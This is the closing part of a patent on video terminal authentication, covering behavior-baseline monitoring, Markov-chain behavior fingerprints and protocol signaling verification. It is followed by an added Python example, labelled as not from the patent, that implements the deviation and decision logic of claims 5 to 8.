[0118] The communication interface 104 is used to connect to at least one user terminal and other network units through a network interface, and to send encapsulated IPv4 packets or IPv4 packets to the user terminal through the network interface.
[0119] Processor 101 may be an integrated circuit chip with signal processing capabilities. In implementation, each step of the above method can be completed by the integrated logic circuitry in the hardware of processor 101 or by instructions in software form. The processor 101 can be a general-purpose processor, including a Central Processing Unit (CPU), a Network Processor (NP), etc.; it can also be a Digital Signal Processor (DSP), an Application Specific Integrated Circuit (ASIC), a Field-Programmable Gate Array (FPGA), or other programmable logic devices, discrete gate or transistor logic devices, or discrete hardware components. It can implement or execute the methods, steps, and logic block diagrams disclosed in the embodiments of this disclosure. The general-purpose processor can be a microprocessor or any conventional processor. The steps of the methods disclosed in the embodiments of this disclosure can be directly manifested as execution by a hardware decoding processor, or execution by a combination of hardware and software modules in the decoding processor. The software module can reside in a mature storage medium in the art, such as random access memory, flash memory, read-only memory, programmable read-only memory, electrically erasable programmable memory, or registers. This storage medium is located in memory 102. The processor 101 reads the information in memory 102 and, in conjunction with its hardware, completes the steps of the method described in the foregoing embodiments.
[0120] This invention also provides a storage medium storing a computer program, which, when executed by a processor, performs the steps of the video terminal authentication control method described in the foregoing embodiments.
[0121] In the several embodiments provided in this application, it should be understood that the disclosed systems, apparatuses, devices, and methods can be implemented in other ways. The system embodiments described above are merely illustrative. For example, the division of units is only a logical functional division, and in actual implementation, there may be other division methods. Furthermore, multiple units or components may be combined or integrated into another system, or some features may be ignored or not executed. Additionally, the coupling or direct coupling or communication connection shown or discussed may be through some communication interfaces; the indirect coupling or communication connection between devices or units may be electrical, mechanical, or other forms.
[0122] The units described as separate components may or may not be physically separate. The components shown as units may or may not be physical units; that is, they may be located in one place or distributed across multiple network units. Some or all of the units can be selected to achieve the purpose of this embodiment according to actual needs.
[0123] In addition, the functional units in the various embodiments of the present invention can be integrated into one processing unit, or each unit can exist physically separately, or two or more units can be integrated into one unit.
[0124] If the aforementioned functions are implemented as software functional units and sold or used as independent products, they can be stored in a processor-executable, non-volatile, computer-readable storage medium. Based on this understanding, the technical solution of this invention, essentially, or the part that contributes to the prior art, or a portion of the technical solution, can be embodied in the form of a software product. This computer software product is stored in a storage medium and includes several instructions to cause a computer device (which may be a personal computer, electronic device, or network device, etc.) to execute all or part of the steps of the methods described in the various embodiments of this invention. The aforementioned storage medium includes various media capable of storing program code, such as USB flash drives, portable hard drives, read-only memory (ROM), random access memory (RAM), magnetic disks, or optical disks.
[0125] Finally, it should be noted that the above-described embodiments are merely specific implementations of the present invention, used to illustrate the technical solutions of the present invention, and not to limit it. The scope of protection of the present invention is not limited thereto. Although the present invention has been described in detail with reference to the foregoing embodiments, those skilled in the art should understand that any person skilled in the art can still modify or easily conceive of changes to the technical solutions described in the foregoing embodiments within the technical scope disclosed in the present invention, or make equivalent substitutions for some of the technical features; and these modifications, changes, or substitutions do not cause the essence of the corresponding technical solutions to deviate from the spirit and scope of the technical solutions of the embodiments of the present invention, and should all be covered within the scope of protection of the present invention. Therefore, the scope of protection of the present invention should be determined by the scope of the claims.
Claims
1. A video terminal authentication control method, characterized in that the method includes: based on the kernel environment parameters of the video terminal, setting behavior monitoring points, constructing a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determining the protocol parsing strategy through the protocol feature bytes of the video terminal; monitoring the access behavior of the video terminal in real time using the behavior monitoring points, and generating behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior; calculating the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and using the protocol parsing strategy to parse and verify the protocol signaling of the access behavior to obtain the protocol verification result of the access behavior; and controlling the video terminal to perform the authentication process using the behavior deviation and the protocol verification result.
2. The video terminal authentication control method according to claim 1, characterized in that setting behavior monitoring points based on the kernel environment parameters of the video terminal includes: determining the kernel environment parameters based on the system kernel type of the video terminal, and determining the file monitoring strategy and kernel communication strategy of the video terminal through the kernel environment parameters; determining the file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy of the video terminal using the file monitoring strategy and the kernel communication strategy; and setting the behavior monitoring points of the video terminal based on the file writing monitoring strategy, the network connection monitoring strategy, and the process creation monitoring strategy.
3. The video terminal authentication control method according to claim 1, characterized in that constructing a behavioral baseline using the attribute values of executable files in the system path of the video terminal includes: when the video terminal is detected to be in a firmware upgrade state or a first network access state, obtaining all executable files under the system path and business application path of the video terminal, and obtaining the network data and manufacturer data of the video terminal; and constructing the behavioral baseline, according to the unique identifier value corresponding to the video terminal, from the filename, version number, and hash value in the attribute values of the executable files, the IP address and MAC address in the network data, and the ID value corresponding to the manufacturer data.
4. The video terminal authentication control method according to claim 1, characterized in that determining the protocol parsing strategy through the protocol feature bytes of the video terminal includes: determining the public video protocol corresponding to the video terminal, and determining the first protocol parsing strategy through the first protocol feature byte corresponding to the protocol feature field of the public video protocol; determining the private video protocol corresponding to the video terminal, determining the offset using the protocol type of the private video protocol, extracting the second protocol feature byte at the offset according to the n-gram algorithm, and determining the second protocol parsing strategy through the second protocol feature byte; and determining the encrypted video protocol corresponding to the video terminal, and, after decrypting the preset keyframes according to the boundary decryption proxy strategy and watermark audit strategy of the encrypted video protocol, determining the third protocol parsing strategy using the generated digital watermark.
5. The video terminal authentication control method according to claim 1, characterized in that monitoring the access behavior of the video terminal in real time using the behavior monitoring points, and generating behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior, includes: using the behavior monitoring points to monitor the file writing behavior, network connection behavior, and process creation behavior of the video terminal in real time; determining the continuous behavior sequence corresponding to the access behavior according to the execution order of the process creation behavior, the file writing behavior, and the network connection behavior; and compressing the continuous behavior sequence into a behavior fingerprint vector using a Markov chain model, and generating the behavior fingerprint data of the access behavior from the hash value of the behavior fingerprint vector.
6. The video terminal authentication control method according to claim 1, characterized in that calculating the behavioral deviation between the behavioral fingerprint data and the behavioral baseline includes: determining the calculation execution strategy for the behavioral baseline using the file modification timestamps corresponding to the behavioral fingerprint data; calculating the similarity comparison result between the behavioral fingerprint data and the behavioral baseline based on the calculation execution strategy; and determining the behavioral similarity between the behavioral fingerprint data and the behavioral baseline from the similarity comparison result, and calculating the behavioral deviation based on the behavioral similarity.
7. The video terminal authentication control method according to claim 1, characterized in that parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy to obtain the protocol verification result of the access behavior includes: obtaining the protocol signaling of the access behavior, and using the protocol parsing strategy to determine the semantic parsing tree corresponding to the protocol signaling; based on the network IP address corresponding to the protocol signaling, parsing and obtaining the operation type data, target resource data, and operator data in the message body of the protocol signaling through the semantic parsing tree; and obtaining the protocol verification result of the access behavior using the data triple formed by the operation type data, the target resource data, and the operator data.
8. The video terminal authentication control method according to claim 1, characterized in that controlling the video terminal to execute the authentication process based on the behavior deviation and the protocol verification result includes: determining the deviation threshold and protocol verification condition corresponding to the video terminal based on the type parameter of the access behavior; if the behavior deviation is greater than the deviation threshold and the protocol verification result does not meet the protocol verification condition, determining the authentication process to be a forced blocking authentication process; if the behavior deviation is greater than the deviation threshold and the protocol verification result meets the protocol verification condition, determining the authentication process to be a behavior anomaly authentication process; if the behavior deviation is not greater than the deviation threshold and the protocol verification result meets the protocol verification condition, determining the authentication process to be a continued operation process; and controlling the video terminal to execute the authentication process, wherein the priority of the forced blocking authentication process is greater than that of the behavior anomaly authentication process, and the priority of the behavior anomaly authentication process is greater than that of the continued operation process.
9. A video terminal authentication control system, characterized in that the system includes: an acquisition layer, used to set behavior monitoring points based on the kernel environment parameters of the video terminal, construct a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy through the protocol feature bytes of the video terminal; an access layer, used to monitor the access behavior of the video terminal in real time using the behavior monitoring points, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior; a control layer, used to calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and to obtain the protocol verification result of the access behavior by parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy; and an application layer, used to control the video terminal to perform the authentication process based on the behavior deviation and the protocol verification result.
10. A video terminal authentication control device, characterized in that the video terminal authentication control device includes a processor and a memory, the memory storing computer-executable instructions that can be executed by the processor, and the processor executing the computer-executable instructions to implement the steps of the video terminal authentication control method according to any one of claims 1 to 8.
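The following is an added worked example, not code from the patent or its assignee, of the dual authentication described in claims 5 to 8: a Markov-chain behavior fingerprint and its hash, a similarity-based deviation from the baseline, the (operation type, target resource, operator) triple check, and the three-way priority decision. The event names, cosine similarity as the similarity measure, the per-access-type thresholds, the allowed triples, the sample sequences, and the handling of the one case claim 8 leaves unstated are all this example's assumptions.

```python
"""Added example (not the patent's own code): behavior fingerprint (claim 5),
deviation from baseline (claim 6), protocol triple check (claim 7) and the
priority decision of claim 8. Names, thresholds and samples are constructed."""
import hashlib
from itertools import product

# The three monitoring-point event types of claims 2 and 5 (names constructed).
EVENTS = ("proc_create", "file_write", "net_connect")

# Claim 8 outcomes, from highest to lowest priority.
FORCED_BLOCKING = "forced_blocking"
BEHAVIOR_ANOMALY = "behavior_anomaly"
OPERATION_CONTINUE = "operation_continue"


def transition_vector(sequence):
    """Behavior fingerprint vector: first-order Markov transition probabilities
    of the continuous behavior sequence, flattened row-major over EVENTS x EVENTS."""
    counts = {pair: 0 for pair in product(EVENTS, repeat=2)}
    for src, dst in zip(sequence, sequence[1:]):
        counts[(src, dst)] += 1
    vector = []
    for src in EVENTS:
        total = sum(counts[(src, dst)] for dst in EVENTS)
        vector.extend(counts[(src, dst)] / total if total else 0.0 for dst in EVENTS)
    return vector


def fingerprint_hash(vector):
    """Behavior fingerprint data: SHA-256 of the quantised vector, so the same
    transition structure hashes identically regardless of sequence length."""
    return hashlib.sha256(",".join(f"{p:.3f}" for p in vector).encode()).hexdigest()


def behavior_deviation(vector, baseline):
    """Deviation in [0, 1] as 1 - cosine similarity (the patent only says
    'similarity comparison'; cosine is this example's assumption)."""
    dot = sum(a * b for a, b in zip(vector, baseline))
    norm = (sum(a * a for a in vector) * sum(b * b for b in baseline)) ** 0.5
    return 1.0 if norm == 0 else round(1.0 - dot / norm, 6)


def decide_authentication(deviation, threshold, protocol_ok):
    """Claim 8 decision table. The claim does not enumerate the case (deviation
    within threshold, protocol check failed); this example assumes it falls to
    forced blocking, the highest-priority process."""
    exceeded = deviation > threshold
    if exceeded and not protocol_ok:
        return FORCED_BLOCKING
    if exceeded and protocol_ok:
        return BEHAVIOR_ANOMALY
    if not exceeded and protocol_ok:
        return OPERATION_CONTINUE
    return FORCED_BLOCKING  # assumption, see docstring


# Constructed samples: thresholds keyed by the access-behavior type parameter,
# allowed (operation type, target resource, operator) triples, and sequences.
THRESHOLDS = {"video_pull": 0.2, "ptz_control": 0.1}
ALLOWED_TRIPLES = {("play", "cam01/stream1", "operator_a"), ("ptz_move", "cam01", "operator_a")}
BASELINE_SEQ = ["proc_create", "file_write", "net_connect"] * 4  # learned at first access
NORMAL_SEQ = ["proc_create", "file_write", "net_connect"] * 3
IMPLANT_SEQ = ["proc_create", "file_write", "net_connect", "net_connect",
               "file_write", "proc_create", "net_connect"]  # transitions absent from baseline


def evaluate(sequence, access_type, triple):
    """Dual authentication of one access behavior: returns (deviation, process)."""
    dev = behavior_deviation(transition_vector(sequence), transition_vector(BASELINE_SEQ))
    return dev, decide_authentication(dev, THRESHOLDS[access_type], triple in ALLOWED_TRIPLES)
```

Running `evaluate(IMPLANT_SEQ, "video_pull", ("play", "cam01/stream1", "operator_a"))` yields a deviation above the threshold with a valid triple, so the behavior anomaly process is chosen; the same sequence with an unknown operator is forced-blocked.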